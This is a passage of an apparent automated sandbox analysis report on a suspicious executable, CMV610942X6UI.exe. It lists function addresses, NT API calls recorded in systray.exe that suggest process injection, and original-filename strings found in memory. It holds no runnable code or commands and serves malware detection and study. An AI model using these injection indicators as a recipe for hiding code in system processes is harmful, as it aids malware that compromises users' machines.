            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_05242D30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242D10 NtMapViewOfSection,LdrInitializeThunk,8_2_05242D10
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_05242DF0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242DD0 NtDelayExecution,LdrInitializeThunk,8_2_05242DD0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242C60 NtCreateKey,LdrInitializeThunk,8_2_05242C60
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_05242C70
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_05242CA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242F30 NtCreateSection,LdrInitializeThunk,8_2_05242F30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242FB0 NtResumeThread,LdrInitializeThunk,8_2_05242FB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242FE0 NtCreateFile,LdrInitializeThunk,8_2_05242FE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_05242E80
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242EE0 NtQueueApcThread,LdrInitializeThunk,8_2_05242EE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242B60 NtClose,LdrInitializeThunk,8_2_05242B60
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_05242BA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242BE0 NtQueryValueKey,LdrInitializeThunk,8_2_05242BE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_05242BF0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242AF0 NtWriteFile,LdrInitializeThunk,8_2_05242AF0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242AD0 NtReadFile,LdrInitializeThunk,8_2_05242AD0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052435C0 NtCreateMutant,LdrInitializeThunk,8_2_052435C0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052439B0 NtGetContextThread,LdrInitializeThunk,8_2_052439B0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242D00 NtSetInformationFile,8_2_05242D00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242DB0 NtEnumerateKey,8_2_05242DB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242C00 NtQueryInformationProcess,8_2_05242C00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242CF0 NtOpenProcess,8_2_05242CF0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242CC0 NtQueryVirtualMemory,8_2_05242CC0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242F60 NtCreateProcessEx,8_2_05242F60
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242FA0 NtQuerySection,8_2_05242FA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242F90 NtProtectVirtualMemory,8_2_05242F90
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242E30 NtWriteVirtualMemory,8_2_05242E30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242EA0 NtAdjustPrivilegesToken,8_2_05242EA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242B80 NtQueryInformationFile,8_2_05242B80
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05242AB0 NtWaitForSingleObject,8_2_05242AB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05243010 NtOpenDirectoryObject,8_2_05243010
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05243090 NtSetValueKey,8_2_05243090
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05243D10 NtOpenProcessToken,8_2_05243D10
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05243D70 NtOpenThread,8_2_05243D70
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03257760 NtReadFile,8_2_03257760
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03257600 NtCreateFile,8_2_03257600
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03257A40 NtAllocateVirtualMemory,8_2_03257A40
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03257850 NtDeleteFile,8_2_03257850
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_032578E0 NtClose,8_2_032578E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_00C7D3640_2_00C7D364
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_027F1A700_2_027F1A70
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_027F5AB00_2_027F5AB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_027F6B500_2_027F6B50
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 0_2_027F11980_2_027F1198
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0042D0533_2_0042D053
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_004030C03_2_004030C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040F9433_2_0040F943
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040F93C3_2_0040F93C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_004161DE3_2_004161DE
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_004161E33_2_004161E3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040FB633_2_0040FB63
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00402B203_2_00402B20
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0040DBE33_2_0040DBE3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_004023B03_2_004023B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_004026603_2_00402660
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101A1183_2_0101A118
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010081583_2_01008158
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010341A23_2_010341A2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010401AA3_2_010401AA
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010381CC3_2_010381CC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010120003_2_01012000
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F701003_2_00F70100
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103A3523_2_0103A352
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010403E63_2_010403E6
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8E3F03_2_00F8E3F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010202743_2_01020274
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010002C03_2_010002C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010405913_2_01040591
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010244203_2_01024420
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010324463_2_01032446
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F805353_2_00F80535
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102E4F63_2_0102E4F6
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9C6E03_2_00F9C6E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7C7C03_2_00F7C7C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F807703_2_00F80770
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA47503_2_00FA4750
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FAE8F03_2_00FAE8F0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F668B83_2_00F668B8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0104A9A63_2_0104A9A6
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8A8403_2_00F8A840
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F828403_2_00F82840
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F829A03_2_00F829A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F969623_2_00F96962
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103AB403_2_0103AB40
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7EA803_2_00F7EA80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01036BD73_2_01036BD7
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F70CF23_2_00F70CF2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101CD1F3_2_0101CD1F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80C003_2_00F80C00
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F7ADE03_2_00F7ADE0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F98DBF3_2_00F98DBF
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01020CB53_2_01020CB5
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8AD003_2_00F8AD00
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01022F303_2_01022F30
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F92E903_2_00F92E90
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F80E593_2_00F80E59
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8CFE03_2_00F8CFE0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103EE263_2_0103EE26
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F72FC83_2_00F72FC8
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FFEFA03_2_00FFEFA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103CE933_2_0103CE93
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF4F403_2_00FF4F40
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FA0F303_2_00FA0F30
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC2F283_2_00FC2F28
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103EEDB3_2_0103EEDB
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F870C03_2_00F870C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0104B16B3_2_0104B16B
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F8B1B03_2_00F8B1B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6F1723_2_00F6F172
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FB516C3_2_00FB516C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102F0CC3_2_0102F0CC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103F0E03_2_0103F0E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010370E93_2_010370E9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103132D3_2_0103132D
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9B2C03_2_00F9B2C0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F852A03_2_00F852A0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC739A3_2_00FC739A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F6D34C3_2_00F6D34C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010212ED3_2_010212ED
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010375713_2_01037571
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F714603_2_00F71460
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101D5B03_2_0101D5B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103F43F3_2_0103F43F
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103F7B03_2_0103F7B0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC56303_2_00FC5630
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010316CC3_2_010316CC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_010159103_2_01015910
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F838E03_2_00F838E0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FED8003_2_00FED800
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F899503_2_00F89950
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9B9503_2_00F9B950
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FC5AA03_2_00FC5AA0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103FB763_2_0103FB76
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF3A6C3_2_00FF3A6C
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FBDBF93_2_00FBDBF9
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF5BF03_2_00FF5BF0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01037A463_2_01037A46
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103FA493_2_0103FA49
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9FB803_2_00F9FB80
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01021AA33_2_01021AA3
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0101DAAC3_2_0101DAAC
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0102DAC63_2_0102DAC6
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01031D5A3_2_01031D5A
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_01037D733_2_01037D73
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00FF9C323_2_00FF9C32
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F9FDC03_2_00F9FDC0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F83D403_2_00F83D40
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103FCF23_2_0103FCF2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103FF093_2_0103FF09
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F89EB03_2_00F89EB0
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_0103FFB13_2_0103FFB1
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F43FD53_2_00F43FD5
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F43FD23_2_00F43FD2
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: 3_2_00F81F923_2_00F81F92
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052105358_2_05210535
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052D05918_2_052D0591
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052B44208_2_052B4420
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C24468_2_052C2446
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052BE4F68_2_052BE4F6
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052107708_2_05210770
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052347508_2_05234750
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0520C7C08_2_0520C7C0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0522C6E08_2_0522C6E0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052001008_2_05200100
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052AA1188_2_052AA118
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052981588_2_05298158
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052D01AA8_2_052D01AA
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C41A28_2_052C41A2
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C81CC8_2_052C81CC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052A20008_2_052A2000
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CA3528_2_052CA352
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052D03E68_2_052D03E6
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0521E3F08_2_0521E3F0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052B02748_2_052B0274
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052902C08_2_052902C0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0521AD008_2_0521AD00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052ACD1F8_2_052ACD1F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05228DBF8_2_05228DBF
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0520ADE08_2_0520ADE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05210C008_2_05210C00
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052B0CB58_2_052B0CB5
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05200CF28_2_05200CF2
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05252F288_2_05252F28
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05230F308_2_05230F30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052B2F308_2_052B2F30
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05284F408_2_05284F40
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0528EFA08_2_0528EFA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0521CFE08_2_0521CFE0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05202FC88_2_05202FC8
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CEE268_2_052CEE26
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05210E598_2_05210E59
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05222E908_2_05222E90
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CCE938_2_052CCE93
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CEEDB8_2_052CEEDB
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052269628_2_05226962
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052129A08_2_052129A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052DA9A68_2_052DA9A6
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0521A8408_2_0521A840
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052128408_2_05212840
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051F68B88_2_051F68B8
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0523E8F08_2_0523E8F0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CAB408_2_052CAB40
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C6BD78_2_052C6BD7
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0520EA808_2_0520EA80
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C75718_2_052C7571
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052AD5B08_2_052AD5B0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052D95C38_2_052D95C3
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CF43F8_2_052CF43F
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052014608_2_05201460
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CF7B08_2_052CF7B0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052556308_2_05255630
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C16CC8_2_052C16CC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052DB16B8_2_052DB16B
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0524516C8_2_0524516C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FF1728_2_051FF172
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0521B1B08_2_0521B1B0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C70E98_2_052C70E9
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CF0E08_2_052CF0E0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052170C08_2_052170C0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052BF0CC8_2_052BF0CC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C132D8_2_052C132D
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051FD34C8_2_051FD34C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0525739A8_2_0525739A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052152A08_2_052152A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052B12ED8_2_052B12ED
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0522B2C08_2_0522B2C0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C7D738_2_052C7D73
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05213D408_2_05213D40
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C1D5A8_2_052C1D5A
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0522FDC08_2_0522FDC0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05289C328_2_05289C32
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CFCF28_2_052CFCF2
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CFF098_2_052CFF09
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CFFB18_2_052CFFB1
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05211F928_2_05211F92
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D3FD58_2_051D3FD5
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_051D3FD28_2_051D3FD2
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05219EB08_2_05219EB0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052A59108_2_052A5910
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052199508_2_05219950
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0522B9508_2_0522B950
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0527D8008_2_0527D800
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052138E08_2_052138E0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CFB768_2_052CFB76
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0522FB808_2_0522FB80
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05285BF08_2_05285BF0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0524DBF98_2_0524DBF9
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05283A6C8_2_05283A6C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052CFA498_2_052CFA49
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052C7A468_2_052C7A46
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_05255AA08_2_05255AA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052ADAAC8_2_052ADAAC
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052B1AA38_2_052B1AA3
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_052BDAC68_2_052BDAC6
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_032413B08_2_032413B0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323C6008_2_0323C600
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323C5F98_2_0323C5F9
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323C8208_2_0323C820
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_0323A8A08_2_0323A8A0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03242EA08_2_03242EA0
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03242E9B8_2_03242E9B
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_03259D108_2_03259D10
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCA2C98_2_04FCA2C9
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCAFF88_2_04FCAFF8
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCBF8C8_2_04FCBF8C
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCBAD48_2_04FCBAD4
            Source: C:\Windows\SysWOW64\systray.exeCode function: 8_2_04FCBBF38_2_04FCBBF3
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0528F290 appears 105 times
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 05257E54 appears 111 times
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 051FB970 appears 280 times
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 0527EA12 appears 86 times
            Source: C:\Windows\SysWOW64\systray.exeCode function: String function: 05245130 appears 58 times
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: String function: 00FB5130 appears 58 times
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: String function: 00FEEA12 appears 86 times
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: String function: 00FFF290 appears 105 times
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: String function: 00FC7E54 appears 103 times
            Source: C:\Users\user\Desktop\CMV610942X6UI.exeCode function: String function: 00F6B970 appears 280 times
            Source: CMV610942X6UI.exe, 00000000.00000000.1389288785.0000000000630000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesxkr.exe> vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exe, 00000000.00000002.1500176018.00000000029E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exe, 00000000.00000002.1504679436.000000000D150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exe, 00000000.00000002.1503469878.0000000005570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exe, 00000000.00000002.1499643954.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exe, 00000003.00000002.1790525561.000000000106D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exe, 00000003.00000002.1790384928.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesystray.exej% vs CMV610942X6UI.exe
            Source: CMV610942X6UI.exeBinary or memory string: OriginalFilenamesxkr.exe> vs CMV610942X6UI.exe
